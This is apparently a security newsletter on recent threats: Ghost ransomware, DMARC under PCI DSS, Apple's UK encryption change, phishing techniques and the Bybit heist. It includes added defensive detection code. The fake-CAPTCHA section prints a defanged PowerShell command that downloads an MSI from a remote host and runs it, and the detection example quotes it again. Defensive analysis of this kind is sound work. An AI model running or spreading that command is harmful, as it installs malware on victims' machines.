
Intelphreak - February 28, 2025

The Ghost/Cring Ransomware Gang's Unique Success; DMARC Required Under PCI DSS On March 31st of 2025; Apple Removes iCloud Encryption for UK; Recent High Efficacy Social Engineering Tactics; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange

ResidentGood, SirPicklJohn
Presented By ResidentGood & SirPicklJohn of Infophreak

Precedence: Routine

BLUF: The Ghost/Cring Ransomware Gang's Unique Success; DMARC Will Be Required Under PCI DSS 4.0.1 On March 31st of 2025; Apple Removes End-to-End iCloud Encryption for UK Users; Recent High Efficacy Social Engineering Tactics Include Reverse Proxy 2FA Bypass, Watering Hole Poisoning With Fake CAPTCHAs, Leveraging The Darcula 3.0 Phishing Kit, and Evolved Credential Phishing; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange via Supply-Chain Attack


BEGIN TEARLINE

[Adversary TTPs] New Insights on the Ghost Ransomware Gang and their Peculiar Success

On February 19th, 2025, the FBI, CISA, and MS-ISAC released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Ghost has victims in over 70 countries and specifically targets internet-facing systems with known, unpatched vulnerabilities (some of which are over a decade old!). This gang is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.

That is a lot of names for one group, but this is not due to any errors or laziness in attribution - this group has an extensive suite of TTPs that make it extremely stealthy and hard to track. I extensively analyze this in the blog linked here, which contains new findings that even the FBI/CISA report missed! While reading all of the recent news reports on the gang, I had the burning question: What makes Ghost, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?

My investigation uncovered that all of the following factors, especially when working in tandem with each other, massively contribute to Ghost's success in both their profitability and their ability to give researchers and prosecutors a headache:

  • Threatening double-extortion, while not actually exfiltrating that much data
  • "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
  • Tailoring attacks and demands to the victim
  • Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars, instead of millions like those of other high-profile gangs
  • Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
  • Short, minimal, or no persistence
  • Lack of domain registration
  • Defense evasion, disablement, and impersonation, combined with LOTL
  • Anti-forensics and anti-system-recovery
  • Anti-debugging/anti-reverse engineering
  • Inconsistency and fluidity
  • Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
  • Specific targeting:
    • Public-facing applications and devices
    • Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
    • Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
  • Imitating/being imitated by other ransomware groups

In combination with the above factors, this group augments its success with the inconsistent use of at least 7 different executable ransomware payloads, 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them.

Analyst comments: (SirPicklJohn) Again, please check out this linked blog to see the following:

  • a full breakdown of how Ghost differentiates itself,
  • the investigation into all of the factors making Ghost uniquely successful,
  • recommendations on how to effectively defend against Ghost, and
  • lists of all the resources/indicators of compromise currently linked to Ghost.

[Compliance] PCI DSS 4.0.1 Mandates DMARC By 31st March 2025

DMARC (Domain-based Message Authentication, Reporting & Conformance) will become a requirement for PCI DSS version 4.0.1 compliance on March 31st, 2025. In order to implement DMARC, an organization must first implement the following two controls:

  • Sender Policy Framework (SPF): SPF authenticates email by checking that the IP address of the sending mail server is authorized to send mail for the domain in question. The domain owner publishes a DNS record listing the mail servers authorized to send on its behalf. This control helps prevent email spoofing, where an attacker tricks a user into thinking an email was sent by a trusted entity. A guide to creating SPF records can be found here.

  • DomainKeys Identified Mail (DKIM): DKIM lets a recipient mail server verify the sender and the integrity of the message in transit via a digital signature. The sending server selects certain email fields, such as the From header and the message body, hashes them, and signs that hash with a private key that only the sender controls; the resulting signature is added to the email as a header. The receiver fetches the matching public key from the sender's DNS records, verifies the signature, and compares the signed hash against the hash it computes over the same fields. This verifies that the email really came from the sender and that its contents were not altered in transit. A guide to setting up DKIM can be found here.

With both of these verification processes in place, DMARC allows an organization to control what happens when a message fails both DKIM & SPF verification. DMARC Policies include doing nothing, quarantining the message, or outright rejecting the message. With DMARC, an organization can gather and analyze data about messages that are failing verification. These metrics can be helpful in measuring malicious use of your domains.
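The policy decision described above, as an added example that is not from the original post: a receiver-side check that combines the SPF and DKIM results with DMARC's alignment rules and returns the action the domain's policy asks for. The domain example.com, its DMARC record, and the authentication results are constructed for illustration.

```python
from dataclasses import dataclass

# Constructed DMARC TXT record for the hypothetical domain example.com.
DMARC_RECORD = ("v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; "
                "rua=mailto:dmarc-reports@example.com")


@dataclass
class AuthResults:
    """Authentication results for one message (constructed inputs)."""
    from_domain: str   # domain of the RFC5322.From header the user sees
    spf_result: str    # "pass", "fail", "softfail", "none", ...
    spf_domain: str    # envelope (MAIL FROM) domain SPF was evaluated for
    dkim_result: str   # "pass", "fail", "none"
    dkim_domain: str   # d= tag of the DKIM signature ("" if unsigned)


def parse_dmarc(record: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict, filling DMARC defaults."""
    tags = {"p": "none", "adkim": "r", "aspf": "r"}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain approximated as the last two labels.
    Assumption for brevity; production code must use the Public Suffix List."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(header_domain: str, auth_domain: str, mode: str) -> bool:
    """Identifier alignment: strict ('s') is an exact match, relaxed ('r')
    accepts any domain under the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return header_domain.lower() == auth_domain.lower()
    return org_domain(header_domain) == org_domain(auth_domain)


def dmarc_disposition(record: str, r: AuthResults) -> str:
    """Return 'pass', or the policy action ('none', 'quarantine', 'reject')
    a receiver applies when neither SPF nor DKIM passes *with alignment*."""
    tags = parse_dmarc(record)
    spf_ok = r.spf_result == "pass" and aligned(r.from_domain, r.spf_domain, tags["aspf"])
    dkim_ok = r.dkim_result == "pass" and aligned(r.from_domain, r.dkim_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    # sp= (subdomain policy) applies when the From domain is a subdomain of the
    # organizational domain that published the record; otherwise p= applies.
    is_subdomain = r.from_domain.lower() != org_domain(r.from_domain)
    return tags.get("sp", tags["p"]) if is_subdomain else tags["p"]


if __name__ == "__main__":
    # A spoof that passes SPF for the attacker's own envelope domain but is
    # not aligned with the visible From domain, so DMARC still rejects it.
    spoof = AuthResults("example.com", "pass", "attacker.example", "none", "")
    print(dmarc_disposition(DMARC_RECORD, spoof))  # reject
```

The spoof case is the one SPF alone misses: the attacker's envelope domain passes SPF, but DMARC requires the passing identifier to align with the From domain the recipient actually sees.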

Analyst Comments: (ResidentGood) This update is very beneficial as requirements yield more compliance than guidelines. Even if your organization is outside the scope of PCI DSS, DMARC can be a very useful tool for staying on top of domain security. Managed Service Providers with clients that handle card data must ensure compliance by implementing DMARC before the 31st of March, 2025. After that date it will be looked for during PCI DSS audits. A solid guide on setting up DMARC can be found here.

[Law] Apple Pulls Advanced Data Protection from UK Users

Apple confirmed on Friday, February 21st that they will be pulling their iCloud Advanced Data Protection (ADP) feature for users in the UK (current & new) in an exclusive statement to TechCrunch. A spokesperson for Apple, Fred Sainz, said they are gravely disappointed that they will not be able to offer this feature to their UK users. Advanced Data Protection is an optional feature that allows users to enable end-to-end encryption for most of their iCloud data, including backups, photos and notes. This keeps data secure in transit between user devices and Apple's iCloud servers. It also protects against the manipulation of data.

  • The UK government issued a Technical Capability Notice to Apple demanding it give them full access to encrypted user iCloud data (originally reported by the Washington Post). Apple will likely appeal this notice to a secret panel and a judge in the UK; however, it is against the law both to not comply with the notice during the appeals process and to reveal the details of the secret notice.

  • This order was issued under the UK Investigatory Powers Act of 2016 which is quite controversial amongst privacy advocates across the globe. The purpose of this legislation is to enhance the capabilities of security agencies, intelligence agencies, law enforcement agencies, and public authorities to intercept and access communications. The law was designed with independent oversight & safeguards to protect the civil liberties of UK citizens. On February 6th & 7th of 2025, a representative of the UK Home Office said “We do not comment on operational matters, including for example confirming or denying the existence of any such notices…“ according to multiple media publications.

  • Data like health information, iMessages, FaceTime calls, and keychain credentials will still be protected by Apple encryption. Data that is not protected by end-to-end encryption will be readable both by Apple and by entities that successfully obtain a subpoena for it. Apple cannot automatically disable ADP for UK users that have it enabled, but they will require the user to disable it in order to keep using their iCloud account. This would aid in law enforcement efforts to collect evidence on suspects that use iCloud encryption.

  • The US Director of National Intelligence, Tulsi Gabbard, on February 25th wrote a letter to 2 US legislators stating the US is investigating whether this development will affect US Apple users and violate a bilateral agreement between the US & UK. The treaty in question is the CLOUD Act, which prevents both the US & the UK from demanding data on the citizens of the other country.

  • Apple has quite a history of legal conflicts with various government entities over protecting the privacy of its users. The most famous case was in 2016, when it won a case against a US government order to unlock the iPhone of a suspected terrorist. In a 2022 statement made to The Guardian, UK government officials came out against Apple introducing end-to-end encryption for cloud storage.

Analyst Comments: (ResidentGood) It is hard to find official information on this story as the order itself has not been released to the public. Privacy advocates are railing against this development as they claim it sets a precedent for more authoritarian governments to follow suit. While protecting victims is a high priority, building vulnerabilities in technology can lead to greater breaches of privacy & cyberattacks. Having more information about security controls that are not in place in certain jurisdictions makes it easier for attackers to target victims in those jurisdictions. Stories like this one are important to follow because they can set greater precedents for the cybersecurity industry as a whole.

[Adversary TTPs] The Latest High-Efficacy Tactics Used in Social Engineering Attacks

Social engineering and phishing attacks remain a constant concern in cybersecurity! The following four case studies represent some of the high-efficacy attack techniques that threat actors have been using in the wild recently:

"EvilProxy" Reverse Proxy Attacks

In this kind of attack, the session cookie/token of a user is stolen by the adversary using something called a "reverse proxy", which acts as an intermediary between the end-user and the cloud service (such as Microsoft 365). This bypasses the need for a user to input login credentials or utilize MFA tokens, as the user's session has already been authenticated with these.

Attack Chain Breakdown:

  1. Phishing email is sent to the victim (potentially from a compromised user that the victim trusts).
  2. The link in the email goes to a bogus intermediary site, such as the following:
    • Note the code of the malicious site, which contains an encoded link to the reverse proxy:
      • aHR0cHM6Ly8wLmluZHVzdHJpYWx0cnVja3Muc2l0ZS8/dXNlcm5hbWU9 (this is an example of obfuscation for defense evasion)
      • hXXps[:]//0[.]industrialtrucks[.]site/?username=
      • The code above takes the email address that the user enters and then makes a request with it as a parameter to the industrialtrucks site, which is the actual reverse proxy that compromises the user.
  3. If the victim user is logged into the targeted cloud service in another tab, then that already-authenticated session is passed through the reverse proxy (compromising the session), to the legitimate cloud service.
  4. With access to the account, the attacker is able to then employ a variety of post-exploitation techniques:
    • As observed in this case, the attacker can add email forwarding rules (MITRE ATT&CK Technique T1114.003) to siphon emails (i.e., immediately removing them from the victim's inbox and into a more subtle folder the attacker monitors, so the victim never knows they received an email) from another person that the victim knows, in order to target that other person.
    • The initial phishing email, or new phishing emails, can be sent to other personnel.
    • Data in the account can begin to be exfiltrated.

Watering-Hole Attack with Fake CAPTCHAs

In this attack, a legitimate website (or a plugin that legitimate sites use) is compromised and seeded with malicious code that compromises end users who browse the site, hence the name, by analogy to poisoning a watering hole. One implementation of this is the fake CAPTCHA attack, in which a fake CAPTCHA is displayed that copies a malicious PowerShell script to the user's clipboard and instructs them to press a series of keyboard shortcuts that execute that code.

Attack Chain:

  1. User browses a legitimate website (which has subtly been compromised), and after about 30-60 seconds, a black overlay appears with a CAPTCHA: (note that the image has been heavily obfuscated/redacted to protect the identity of the victim)
  2. After clicking on the CAPTCHA, the user is walked through a series of steps to copy and paste the malicious PowerShell script:
    1. (Note that you can even see the "Successful" dialogue box pop up to indicate that the script was copied to the user's clipboard.)
    2. The following script (with defanged links/extensions) is copied: cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw[.]msi'; Invoke-RestMethod -Uri 'https[:]//qq51f[.]short[.]gy/1' -OutFile $path; Start-Process $path;
  3. Malware is installed on the victim's computer, before doing all the nasty things that malware can do.
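The command-line shape of the script above is what a detection can key on. The following is an added example, not from the original post: a weighted heuristic over process-creation events (constructed here in the shape of a generic EDR/Sysmon log) that scores the quoted fake-CAPTCHA command highly while leaving routine PowerShell administration below the alert threshold. The event records, rule weights and threshold are assumptions for this illustration.

```python
import re

# Constructed process-creation events. The first mirrors the defanged command
# quoted above (URL and extension left defanged; the rules tolerate that);
# the other two are benign administrative uses of PowerShell.
EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r"cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command "
                r"$path='c:\users\public\3aw[.]msi'; Invoke-RestMethod -Uri "
                r"'https[:]//qq51f[.]short[.]gy/1' -OutFile $path; Start-Process $path;"},
    {"id": 2, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell -NoProfile -Command Get-Service -Name Spooler"},
    {"id": 3, "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# (regex, weight, reason). All patterns are matched case-insensitively.
RULES = [
    (r"-w(indowstyle)?\s+h(idden)?\b", 2, "hidden PowerShell window"),
    (r"-nop(rofile)?\b", 1, "profile skipped"),
    (r"\bstart\s+/min\b", 1, "minimized cmd launcher"),
    (r"invoke-restmethod|invoke-webrequest|\birm\b|\biwr\b|downloadstring|downloadfile",
     2, "download cmdlet"),
    (r"https?(\[:\]|:)//", 1, "URL in command line"),
    (r"-outfile\b|\\users\\public\\|%temp%", 1, "payload written to a world-writable path"),
    (r"start-process|msiexec|\.msi\b|\[\.\]msi\b", 1, "dropped file executed"),
]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def score_event(event: dict) -> tuple[int, list[str]]:
    """Weighted heuristic score for one process-creation event."""
    score, reasons = 0, []
    # A shell spawned directly by explorer.exe is what a pasted Run-dialog
    # or keyboard-shortcut launch looks like; scripted admin tasks rarely do this.
    if event["parent"].lower() == "explorer.exe" and event["image"].lower() in SHELLS:
        score += 1
        reasons.append("shell launched interactively from explorer.exe")
    for pattern, weight, why in RULES:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            score += weight
            reasons.append(why)
    return score, reasons


def flag_events(events: list[dict], threshold: int = 5) -> list[int]:
    """Return ids of events scoring at or above the alert threshold."""
    return [e["id"] for e in events if score_event(e)[0] >= threshold]


if __name__ == "__main__":
    for e in EVENTS:
        print(e["id"], *score_event(e))
```

Tune the weights against your own baseline; the value of this approach is that several individually weak signals (hidden window, download cmdlet, write to a public path, immediate execution) only co-occur in this pattern.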

Further analysis of this specific attack (who's behind it?):

  • In this attack, qq51f[.]short[.]gy/1 (hosted on short.io, a URL shortening site) was requested, which in turn downloaded the malicious 01.brr file from the hosting site hXXps[:]//bestiamos[.]com/
  • Note that bestiamos, hosted by CloudFlare on 104[.]21[.]35[.]172 (replicated on 172[.]67[.]178[.]15, likely for redundancy/backup purposes), hosts 694 other domains (source: whois.com). The name "Julia Smith" is likely bogus, and the address does not exist, but the registrant's email (gustavusabseits[@]gmail.com) has been used to register at least 225 other domains (source: whois.com):

Artifacts from the attack:

  • 3aw.msi
    • Author: Plash Amrita
    • Program name: WiX Toolset (4.0.0.0)
  • Requests to download 01.brr
  • Various folders:
    • fr_patch_test
    • Girlfriend
    • helpAdvanced_test
    • Womenfolk
  • Miscellaneous Malicious Files:
    • taskbg_v1_x64.lnk
    • sqsign.lnk
    • MSBuild.exe (in Microsoft.NET folder)
    • RoboTaskLite.exe
    • fell.jpg
    • residentiary.php
    • rtl280.bpl
    • vcl280.bpl
  • Requests to qq51f[.]short[.]gy or bestiamos[.]com
  • The following Solana crypto address: 5V12gWimv9jG6xBfnQ1txHc3vg5rvA3cjaSeYiVs3YXp (found on an illegitimate lookalike [gettrumpmeme[.]us] of the official TRUMP memecoin site [gettrumpmemes.com] - the attacker registered 6 lookalikes in total)
  • I did not take the time to run whois lookups on every single domain that was registered by gustavusabseits[@]gmail.com, but they may offer more insight into the source of this attack!

PhaaS and Site-Cloning by Darcula

Sophisticated phishing attacks are easier for novice attackers to execute than ever before! The threat actor "darcula" recently hit the news by announcing a major feature update to their Chinese and playfully cat-themed "darcula-suite" PhaaS (Phishing-as-a-Service) platform. Darcula was originally discovered in July 2023 by the researcher Oshri Kalfon (who has a brilliant writeup on what he found, that you can check out here: part 1, part 2), and the newly released version (v3) of the platform offers its users the following features, spanning protection, ease of use, and robust fraud mechanisms:

  • User-Friendly, Enterprise-Grade Administrator Dashboard:

    • Developed with Docker, Node, React, SQLite, and 3rd-party NPM libraries. These all increase user-experience and accessibility.
    • Simplified campaign management
    • Performance dashboard
    • Real-time logs of stolen credentials, where victims are browsing, etc.
    • Automatic Telegram notifications after someone falls victim
  • Ability to Send RCS and iMessage Texts:

    • This bypasses SMS firewalls and employs end-to-end encryption (reducing the efficacy of filters and detection mechanisms)
  • Anti-Detection Features:

    • Randomized deployment paths to prevent hostname-level analysis
    • IP blocking
    • User-agent blocking to stop crawlers and scrapers
    • Device-type restrictions
    • Client-side page rendering with React, requiring a headless browser that prevents detection by some tools and providers
    • Tips from darcula, including hiding the origin server via CDN providers such as Cloudflare
  • Automated Credit Card Theft and Conversion Tools

    • Stolen credit card data can be turned into virtual card images for use in digital wallets/payment apps (like Apple Pay)
    • Note: Darcula-linked Telegram groups are already selling burner phones with pre-loaded stolen cards:
  • Custom phishing kit generator

    • This is one of the most consequential features, allowing users to clone any website with Puppeteer and modify elements like login fields, payment forms, 2FA prompts, etc. Pre-made templates are available.

      The Darcula-Suite, with the user editing elements of a cloned USPS site in preparation of an attack.

Note that Netcraft, a cybercrime disruption and takedown company that is one of the main researchers investigating darcula, has highlighted how prolific darcula phishing sites are. Using a worldwide proxy network and various tactics to bypass the darcula platform's defenses (read their report here), since 2024 Netcraft has...

  • detected 120 new domains hosting darcula phishing pages each day;
  • blocked about 96,600 Darcula 2.0 domains;
  • blocked about 20,200 phishing sites; and
  • blocked 30,900 IP addresses associated with darcula sites.

With version 3.0 of darcula-suite released, it is harder to detect and stop darcula attacks, the "average sophistication" of PhaaS and phishing campaigns is increasing, and sophisticated phishing attacks are even more accessible to anybody who wants to use them.

Classic Credential Phishing

These haven't gone away either! However, due to advances in security filtering and phishing detection, the sophistication of credential phishing pages has also evolved, with an attack chain looking like the following:

  1. A phishing email (e.g., a fake "Request For Information" response email) is sent to the end user, who clicks a link to an external file hosting site. Using this intermediary site helps phishing emails bypass security mechanisms because it does not actually contain any malicious code.
  2. The links in the external file hosting site, after being clicked, redirect the user to the actual phishing page that impersonates a service like Microsoft 365.

Note that this landing page, after getting past the CAPTCHA on the /BoDc/ page, was located at a different URL every time it was visited. Additionally, after compromising the user, the attacker was free to do any other post-exploitation activities:

  • Sending similar phishing emails to other users in the victim's address list (and then responding if they question the legitimacy of the email).
  • Stealing sensitive documents and data stored in the victim's account.
  • Registering their own MFA (if a previous MFA token or code was stolen) for persistence.
  • Employing MITRE ATT&CK Technique T1114.003 (Email Forwarding Rule).
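Both the EvilProxy case above and this one end with the attacker creating inbox rules (T1114.003) to siphon or hide mail. As an added example that is not from the original post, here is detection logic over constructed audit records shaped like Microsoft 365 Unified Audit Log entries for New-InboxRule/Set-InboxRule: it flags forwarding to external domains and rules that park specific senders' mail in rarely viewed folders. The record contents, org domain list and folder list are assumptions.

```python
# Constructed audit records in the shape of Microsoft 365 Unified Audit Log
# (Exchange) entries: cmdlet in "Operation", arguments as {"Name","Value"}
# pairs in "Parameters". Users, addresses and rule names are made up.
RECORDS = [
    {"Operation": "New-InboxRule", "UserId": "alice@example.com",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "collector@mail.example"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"Operation": "Set-InboxRule", "UserId": "alice@example.com",
     "Parameters": [{"Name": "Identity", "Value": "rss"},
                    {"Name": "From", "Value": "bob@partner.example"},
                    {"Name": "MoveToFolder", "Value": "RSS Feeds"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "carol@example.com",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "SubjectContainsWords", "Value": "newsletter"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
]

ORG_DOMAINS = {"example.com"}                     # assumption: the tenant's domains
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
# Folders users rarely open; siphoned mail is parked here so the victim
# "never knows they received an email".
HIDEAWAY_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                    "junk email", "deleted items", "archive"}
LEVEL_NAMES = {0: "none", 1: "medium", 2: "high"}


def params(record: dict) -> dict:
    """Flatten the Name/Value parameter list into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def analyze_rule(record: dict, org_domains: set = ORG_DOMAINS) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one inbox-rule audit record."""
    if record.get("Operation") not in RULE_OPS:
        return "none", []
    p = params(record)
    findings = []  # (level, reason)
    for name in FORWARD_PARAMS & p.keys():
        for addr in p[name].split(";"):
            domain = addr.strip().rsplit("@", 1)[-1].lower()
            if domain and domain not in org_domains:
                findings.append((2, f"{name} to external domain {domain}"))
    deletes = p.get("DeleteMessage") == "True"
    hides = deletes or p.get("MoveToFolder", "").lower() in HIDEAWAY_FOLDERS
    quiet = deletes or p.get("MarkAsRead") == "True"
    if hides:
        # Targeting one sender ("From") and silencing the message is the
        # pattern used to intercept a known contact's replies.
        level = 2 if (quiet or "From" in p) else 1
        findings.append((level, "mail routed to a rarely viewed folder or deleted"))
    if "Name" in p and len(p["Name"]) <= 2:
        findings.append((1, "rule name is one or two characters (blends in)"))
    severity = max((lvl for lvl, _ in findings), default=0)
    return LEVEL_NAMES[severity], [why for _, why in findings]


if __name__ == "__main__":
    for rec in RECORDS:
        print(rec["UserId"], rec["Operation"], *analyze_rule(rec))
```

Run this over the tenant's rule-creation events on a schedule rather than once: the rule survives a password reset, so a cleaned-up account with the rule still in place is still leaking mail.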

Analyst Comments: (SirPicklJohn) Thanks for reading! Hopefully this gives you an inside view into the real-world attacks and techniques that are currently being used in the wild! Defenders can implement the following steps to effectively mitigate these attacks:

  • SETA: First and foremost, implement a robust security education, training, and awareness (SAT/SETA) program, with the leader of it being an articulate individual who understands its immense value. Sometimes, the only thing that prevents (or enables!) an attack is the human element!
  • Tips on MFA, from One Defender to Another: Rather than leaving you with the endlessly-repeated advice to "enable multifactor authentication on all cloud accounts", which you should do, I'd like to also say that there are still plenty of people who have never used multifactor authentication before and do not know what it is. You will likely receive pushback when mandating organization-wide multifactor authentication, but you need to stand firm, calmly articulate how important it is, and walk users through the process while troubleshooting their issues. Additionally, "phishing-resistant MFA" can prevent basic attacks like the credential phishing attack above by sending push notifications or displaying a window for a security key rather than just asking for a code - this is because a phishing site like blelinelipor will not be able to send a push notification to a user's phone or utilize the user's security key to compromise the account, while the site can still ask for and use a valid MFA code.
  • Conditional Access Policies: Conditional access policies are strong security controls that restrict or grant user access based on "if-then" statements. For example, "geofencing" users by restricting their logins to certain geographic areas, requiring all users to use a certain kind of MFA, allowing or denying logins from certain types of devices on certain types of networks and IP ranges, etc.

Thank you for reading - stay safe!

[Major Incident] Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange

On Friday, February 21, 2025, the popular Dubai-based cryptocurrency exchange Bybit lost $1.46 billion (in USD) in a cyberattack. The attackers stole this sum in the form of Ethereum and Staked Ether by creating malicious transactions to transfer the funds from a cold wallet (a crypto wallet where the private keys are stored offline) to a wallet address controlled by the threat actor. After exfiltration, the funds were laundered to prevent tracing.

According to Bybit, several third-parties collaborated in investigating & containing this situation including:

  • Forensic Analysis: Mandiant, Verichains, and Sygnia.co
  • Bad Actor Tracing & Identification: ZeroShadow
  • Tagging Exploited Addresses on Blockchains: Chainalysis, Elliptic, TRM, Goplus, SEAL911, and ZachXBT
  • Security Advisory: SlowMist, BlockSec, BEOSIN
  • Compliance & Risk Assessment: VerifyVASP, AML Bot, CryptoForensic
  • Cross-chain security Measures: Binance, Coinbase, Bitget, Polygon, Arbitrum, Optimism, Wormhole, Synapse, Connext, Chainflip, Across.to, Symbiosis.finance, AVAX, ChangeNow, fixedfloat, and cBridge

The contract with malicious transfer logic was located at 0x96221423681A6d52E184D440a8eFCEbB105C7242

The contract with malicious withdrawal abilities was located at 0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516

According to the preliminary investigation report from Verichains: “[t]he attacker successfully created a multi-signature transaction involving three signers, including the CEO of Bybit. This transaction upgraded Bybit’s multi-signature contract for Cold Wallet 1 (0x1Db92e2EbE8E0c075a02BeA49a2935BcD2dFCF4) on Safe.Global, pointing to a malicious contract (0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516) that was deployed three days earlier.” For emptying the wallets, the sweepETH & sweepERC20 backdoors were used.

List of Initial Threat Actor Addresses:


Sygnia’s investigation found direct injection of malicious JavaScript into a Safe{Wallet} Amazon S3 bucket. This code was designed to alter crypto transactions during signing. It was also designed to activate only for transactions involving Bybit’s main contract address and an unknown test address controlled by the attacker. After execution, the injected S3 resource was replaced with one that did not contain the malicious JavaScript, a technique to avoid detection. Since the attack came from Safe{Wallet}’s infrastructure, the investigation found that Bybit’s infrastructure had not been directly compromised.
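A served script that is swapped in and then swapped back is exactly the case integrity pinning exists for. As an added example, not from the original post or from Safe{Wallet}'s code base, the following computes Subresource Integrity (SRI) values, verifies a served bundle against a pinned value, and audits an HTML page for script tags that carry no integrity attribute. The bundle contents, page and hostnames are constructed for illustration.

```python
import base64
import hashlib
import hmac
import re

# Constructed front-end bundle standing in for a wallet UI script, and the
# same bundle after a hypothetical injection of the kind described above.
ORIGINAL_BUNDLE = "function buildTx(to, value) { return { to: to, value: value }; }\n"
TAMPERED_BUNDLE = ORIGINAL_BUNDLE + "/* injected: rewrites fields at signing time */\n"


def sri_hash(content: str, algo: str = "sha384") -> str:
    """Subresource Integrity value '<algo>-<base64 digest>' over the exact bytes."""
    digest = hashlib.new(algo, content.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_bundle(content: str, pinned: str) -> bool:
    """True only if the served bytes hash to the pinned SRI value.
    The pinned value must come from the release process (e.g. a signed build
    manifest), never from the same bucket that serves the script."""
    algo = pinned.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(content, algo), pinned)


SCRIPT_TAG = re.compile(r"<script\b[^>]*\bsrc=[\"']([^\"']+)[\"'][^>]*>", re.IGNORECASE)


def scripts_without_integrity(html: str) -> list[str]:
    """List script URLs whose tag has no integrity attribute, so a swapped
    file at that URL would load unnoticed by the browser."""
    missing = []
    for m in SCRIPT_TAG.finditer(html):
        if not re.search(r"\bintegrity=", m.group(0), re.IGNORECASE):
            missing.append(m.group(1))
    return missing


# Constructed page: app.js is pinned, vendor.js is not.
INDEX_HTML = f"""<html><head>
<script src="https://static.wallet.example/app.js"
        integrity="{sri_hash(ORIGINAL_BUNDLE)}" crossorigin="anonymous"></script>
<script src="https://static.wallet.example/vendor.js"></script>
</head></html>"""


if __name__ == "__main__":
    pin = sri_hash(ORIGINAL_BUNDLE)
    print("original ok:", verify_bundle(ORIGINAL_BUNDLE, pin))   # True
    print("tampered ok:", verify_bundle(TAMPERED_BUNDLE, pin))   # False
    print("unpinned:", scripts_without_integrity(INDEX_HTML))
```

SRI only protects resources referenced from HTML the browser can trust; if the HTML itself is served from the compromised bucket, the pinned values have to be checked out of band, which is why the comparison above takes its pin from a release artifact rather than the served page.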

During the incident response process, Bybit migrated its funds out of Safe{Wallet} addresses. Bybit created an API of continuously updated suspicious wallet addresses that have been blacklisted. They have also released a HackBounty website to get help from the industry in tracking down the hackers' wallets. Successful interceptions will receive a 10% commission. As of February 24, Bybit claims to have replaced 100% of the stolen funds via loans, large deposits from well-capitalized crypto holders, and purchases of Ethereum.

The FBI confirmed that this attack was carried out by a North Korean APT known as TraderTraitor which has ties to the Lazarus Group. This group is also tracked under the names APT38, BlueNoroff, and Stardust Chollima.

Safe{Wallet} confirmed in a public statement that the compromise of a developer machine led to this incident. They claimed that SAFE contracts were not affected by the incident. In response, Safe conducted an investigation, restored Safe{Wallet} to the main Ethereum chain in phases, reconfigured infrastructure and changed all credentials.

Analyst Comments: (ResidentGood) This is one of the largest cryptocurrency exfiltrations in recent history. The threat actor being tied to North Korea lines up with the trend of North Korean APTs using state-sponsored cyber attacks to finance military operations. This story highlights how important it is for cryptocurrency organizations to secure themselves against supply-chain attacks. Your security controls are not as effective if another organization that is integrated into your tech stack is compromised.

END REPORT


If you are interested in anything Cybersecurity, come check out our Discord

Sources:

The Latest High-Efficacy Social Engineering Attack Tactics

PCI DSS 4.0.1 Mandates DMARC By 31st March 2025

Apple Pulls Advanced Data Protection from UK Users

New Insights on Ghost's Unique Success

Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange